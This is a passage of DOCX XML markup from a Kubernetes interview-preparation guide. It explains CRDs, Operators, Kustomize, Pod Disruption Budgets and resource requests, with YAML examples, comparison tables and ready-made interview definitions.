        <w:t>Real-world examples</w:t>
        <w:br/>
        <w:t>CRDs are used to create:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Databases as a service (Postgres operator)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kafka clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Monitoring systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Backup automation</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Service mesh resources (Istio uses CRDs heavily)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important concept: Operators</w:t>
        <w:br/>
        <w:t>Most CRDs are used with Operators, which:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Watch CRs</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Automate lifecycle management</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Act like a “Kubernetes-native admin bot”</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Extensible Kubernetes API</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Declarative infrastructure for complex systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Automation through controllers</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Native integration with kubectl</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Requires controller logic to be useful</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Complexity increases</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Debugging can be harder</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A Custom Resource Definition (CRD) in Kubernetes is a mechanism that allows users to extend the Kubernetes API by defining custom resource types, enabling the creation and management of domain-specific objects that behave like native Kubernetes resources when paired with a controller or operator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q298. Explain Operators.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Kubernetes Operator in Kubernetes is a custom controller that automates the deployment, management, and lifecycle of complex applications using custom resources (CRDs).</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>An Operator is like a “smart automation bot” that knows how to run and manage an application end-to-end inside Kubernetes.</w:t>
        <w:br/>
        <w:t>It combines:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * CRDs (Custom Resource Definitions) → define new resource types</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Controller logic → automates what happens when those resources change</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Operators are used</w:t>
        <w:br/>
        <w:t>Kubernetes can manage basic things like Pods and Deployments, but complex systems need extra logic:</w:t>
        <w:br/>
        <w:t>For example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Databases (PostgreSQL, MySQL)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kafka clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Redis clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Backup systems</w:t>
        <w:br/>
        <w:t>These require:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Setup + configuration</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Scaling logic</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Failover handling</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Upgrades</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Recovery</w:t>
        <w:br/>
        <w:t>Operators automate all of this.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core components of an Operator</w:t>
        <w:br/>
        <w:t>1. Custom Resource Definition (CRD)</w:t>
        <w:br/>
        <w:t>Defines a new object type like:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Database</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * KafkaCluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * BackupJob</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Custom Resource (CR)</w:t>
        <w:br/>
        <w:t>The actual instance:</w:t>
        <w:br/>
        <w:t>kind: Database</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  engine: postgres</w:t>
        <w:br/>
        <w:t xml:space="preserve">  version: "15"</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Controller (Operator logic)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Watches CRs</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Takes actions to match desired state</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Continuously reconciles actual vs desired state</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works (reconciliation loop)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         1. User creates a Custom Resource</w:t>
        <w:br/>
        <w:t xml:space="preserve">         2. Operator detects the change</w:t>
        <w:br/>
        <w:t xml:space="preserve">         3. Operator checks current cluster state</w:t>
        <w:br/>
        <w:t xml:space="preserve">         4. If mismatch → takes corrective actions</w:t>
        <w:br/>
        <w:t xml:space="preserve">         5. Keeps reconciling continuously</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example flow</w:t>
        <w:br/>
        <w:t>User YAML (Database CR)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ↓</w:t>
        <w:br/>
        <w:t>Operator (Controller)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ↓</w:t>
        <w:br/>
        <w:t>Creates StatefulSet + Service + Storage</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ↓</w:t>
        <w:br/>
        <w:t>Manages backup, scaling, failover</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-world example</w:t>
        <w:br/>
        <w:t>PostgreSQL Operator</w:t>
        <w:br/>
        <w:t>When you create:</w:t>
        <w:br/>
        <w:t>kind: PostgresCluster</w:t>
        <w:br/>
        <w:t>The Operator automatically:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Creates StatefulSet</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Configures storage (PV/PVC)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Sets up replication</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Handles failover</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Manages backups</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Performs upgrades</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Operator vs Controller</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Controller</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Operator</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scope</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Basic resource management</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Full application lifecycle</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Uses CRDs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Optional</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Required</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Deployment controller</w:t>
        <w:br/>
        <w:tab/>
        <w:t>DB operator</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kubernetes = factory</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * CRDs = new product types</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Operator = intelligent robot engineer who knows how to build and maintain that product automatically</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits of Operators</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Automates complex application management</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Reduces manual DevOps effort</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enables self-healing systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Handles upgrades and backups automatically</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Provides Kubernetes-native automation</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Databases (Postgres, MySQL, MongoDB)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Messaging systems (Kafka, RabbitMQ)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Monitoring systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Backup and disaster recovery tools</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Complex to develop</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Requires deep Kubernetes knowledge</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Debugging can be harder</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Overhead for simple applications</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A Kubernetes Operator is a custom controller that extends the Kubernetes API using CRDs and implements application-specific automation logic to manage the full lifecycle of complex applications, including deployment, scaling, upgrades, and recovery, using a continuous reconciliation loop.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q299. What is Kustomize?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Kustomize is a Kubernetes-native configuration management tool used to customize YAML manifests without templating in Kubernetes.</w:t>
        <w:br/>
        <w:t>It is built directly into kubectl (as kubectl apply -k).</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Kustomize lets you reuse and modify Kubernetes YAML files for different environments (dev, staging, prod) without copying or templating.</w:t>
        <w:br/>
        <w:t>Instead of editing files manually or using templates like Helm, you apply patches and overlays.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Kustomize is used</w:t>
        <w:br/>
        <w:t>In real-world Kubernetes setups:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * You have multiple environments</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Each environment needs small differences:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * replicas</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * image tags</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * config values</w:t>
        <w:br/>
        <w:t>Without Kustomize:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * You duplicate YAML files → hard to maintain</w:t>
        <w:br/>
        <w:t>With Kustomize:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * One base YAML + environment-specific overlays</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Kustomize works</w:t>
        <w:br/>
        <w:t>Kustomize uses a base + overlay model:</w:t>
        <w:br/>
        <w:t>1. Base</w:t>
        <w:br/>
        <w:t>Common Kubernetes manifests</w:t>
        <w:br/>
        <w:t>2. Overlays</w:t>
        <w:br/>
        <w:t>Environment-specific customizations</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example structure</w:t>
        <w:br/>
        <w:t>my-app/</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── base/</w:t>
        <w:br/>
        <w:t xml:space="preserve"> │    ├── deployment.yaml</w:t>
        <w:br/>
        <w:t xml:space="preserve"> │    ├── service.yaml</w:t>
        <w:br/>
        <w:t xml:space="preserve"> │    └── kustomization.yaml</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └── overlays/</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ├── dev/</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ├── staging/</w:t>
        <w:br/>
        <w:t xml:space="preserve">      └── prod/</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Base kustomization.yaml</w:t>
        <w:br/>
        <w:t>resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - deployment.yaml</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - service.yaml</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Dev overlay example</w:t>
        <w:br/>
        <w:t>resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - ../../base</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>patches:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - path: replica-patch.yaml</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Patch example</w:t>
        <w:br/>
        <w:t>apiVersion: apps/v1</w:t>
        <w:br/>
        <w:t>kind: Deployment</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: my-app</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  replicas: 2</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Apply configuration</w:t>
        <w:br/>
        <w:t>kubectl apply -k overlays/dev</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features of Kustomize</w:t>
        <w:br/>
        <w:t>1. No templating</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Unlike Helm, no variables or templates</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Uses plain YAML</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Environment overlays</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Dev, staging, prod configs easily separated</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Patching support</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Modify only specific fields (replicas, image, env vars)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Built into kubectl</w:t>
        <w:br/>
        <w:t>kubectl apply -k .</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kustomize vs Helm</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kustomize</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Helm</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Approach</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Declarative patches</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Templating</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Medium–High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Learning curve</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Easy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Moderate</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Flexibility</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Very high</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Built into kubectl</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Base YAML = master blueprint of a house</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kustomize overlays = modifications for different houses:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Dev house → small size</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Prod house → large, production-ready version</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>When to use Kustomize</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Simple to medium complexity deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Environment-based configuration changes</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Teams preferring pure YAML (no templating)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Native Kubernetes workflows</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * No advanced logic (loops, conditions)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Less powerful than Helm for complex apps</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Harder for large reusable application packages</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Kustomize is a Kubernetes-native configuration management tool that allows users to customize and manage Kubernetes manifests using a base-and-overlay approach with patches, enabling environment-specific configurations without templating and integrated directly into kubectl.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q300. What is pod disruption budget?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Pod Disruption Budget (PDB) in Kubernetes is a policy that defines how many Pods of an application can be voluntarily disrupted at a time while maintaining availability.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A PDB ensures that a minimum number or percentage of Pods are always running during planned disruptions.</w:t>
        <w:br/>
        <w:t>It protects applications from voluntary downtime, not failures.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What “disruption” means</w:t>
        <w:br/>
        <w:t>PDB only applies to voluntary disruptions, such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Node maintenance (draining a node)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Cluster upgrades</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Scaling down nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Manual eviction (kubectl drain)</w:t>
        <w:br/>
        <w:t>It does NOT protect against:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Node crashes</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Hardware failure</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Unexpected outages</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why PDB is used</w:t>
        <w:br/>
        <w:t>It helps to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Maintain application availability during maintenance</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Prevent too many Pods from going down at once</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Ensure high availability for critical services</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Control safe rolling updates and cluster operations</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">         1. You define a PDB for a set of Pods (via label selector)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         2. Kubernetes checks the PDB before evicting Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">         3. If eviction violates the budget → eviction is blocked</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key fields in PDB</w:t>
        <w:br/>
        <w:t>1. minAvailable</w:t>
        <w:br/>
        <w:t>Minimum number of Pods that must remain running</w:t>
        <w:br/>
        <w:t>2. maxUnavailable</w:t>
        <w:br/>
        <w:t>Maximum number of Pods that can be unavailable</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example PDB (minAvailable)</w:t>
        <w:br/>
        <w:t>apiVersion: policy/v1</w:t>
        <w:br/>
        <w:t>kind: PodDisruptionBudget</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: my-app-pdb</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  minAvailable: 2</w:t>
        <w:br/>
        <w:t xml:space="preserve">  selector:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    matchLabels:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      app: my-app</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example PDB (maxUnavailable)</w:t>
        <w:br/>
        <w:t>apiVersion: policy/v1</w:t>
        <w:br/>
        <w:t>kind: PodDisruptionBudget</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: my-app-pdb</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  maxUnavailable: 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">  selector:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    matchLabels:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      app: my-app</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What this means</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * You have 3 Pods running</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * PDB: minAvailable = 2</w:t>
        <w:br/>
        <w:t>👉 Kubernetes will ensure:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * At least 2 Pods must always be running</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Only 1 Pod can be evicted at a time</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>PDB vs ReplicaSet</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>PDB</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ReplicaSet</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Control voluntary disruptions</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Maintain replica count</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Focus</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Availability during maintenance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Desired state enforcement</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Action</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Blocks eviction</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Recreates Pods</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Where PDB is used</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * During kubectl drain</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Cluster upgrades</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Node autoscaling (Cluster Autoscaler)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Maintenance operations</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a call center:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Pods = agents</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * PDB = rule saying “at least 2 agents must always be available”</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Maintenance = allowing agents to go on break one at a time, not all together</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important behavior</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Does NOT guarantee uptime during crashes</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Only protects against planned disruptions</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Works with Deployments, StatefulSets, etc.</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Requires proper replica count to be effective</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Always define PDB for critical workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Use minAvailable for high availability apps</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Ensure replica count &gt; PDB requirement</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Combine with HPA and Cluster Autoscaler</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A Pod Disruption Budget in Kubernetes is a policy that limits the number of Pods that can be voluntarily evicted during maintenance or scaling operations, ensuring a minimum level of application availability by preventing disruptions beyond a defined threshold based on minAvailable or maxUnavailable settings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q301. Explain resource requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Resource Requests in Kubernetes define the minimum amount of CPU and memory a container is guaranteed to get.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A resource request is what a container needs to run properly.</w:t>
        <w:br/>
        <w:t>It is used by the Kubernetes scheduler to decide which node can host the Pod.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why resource requests are important</w:t>
        <w:br/>
        <w:t>They help Kubernetes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Schedule Pods on appropriate nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Avoid overloading nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Ensure stable performance</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Prevent resource starvation</w:t>
        <w:br/>
        <w:t>Without requests:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Pods may be scheduled anywhere</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Risk of CPU/memory contention increases</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">         1. You define CPU/memory requests in Pod spec</w:t>
        <w:br/>
        <w:t xml:space="preserve">         2. Scheduler checks available node capacity</w:t>
        <w:br/>
        <w:t xml:space="preserve">         3. Pod is placed only where requested resources fit</w:t>
        <w:br/>
        <w:t xml:space="preserve">         4. Container gets at least that amount guaranteed</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example YAML</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Pod</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
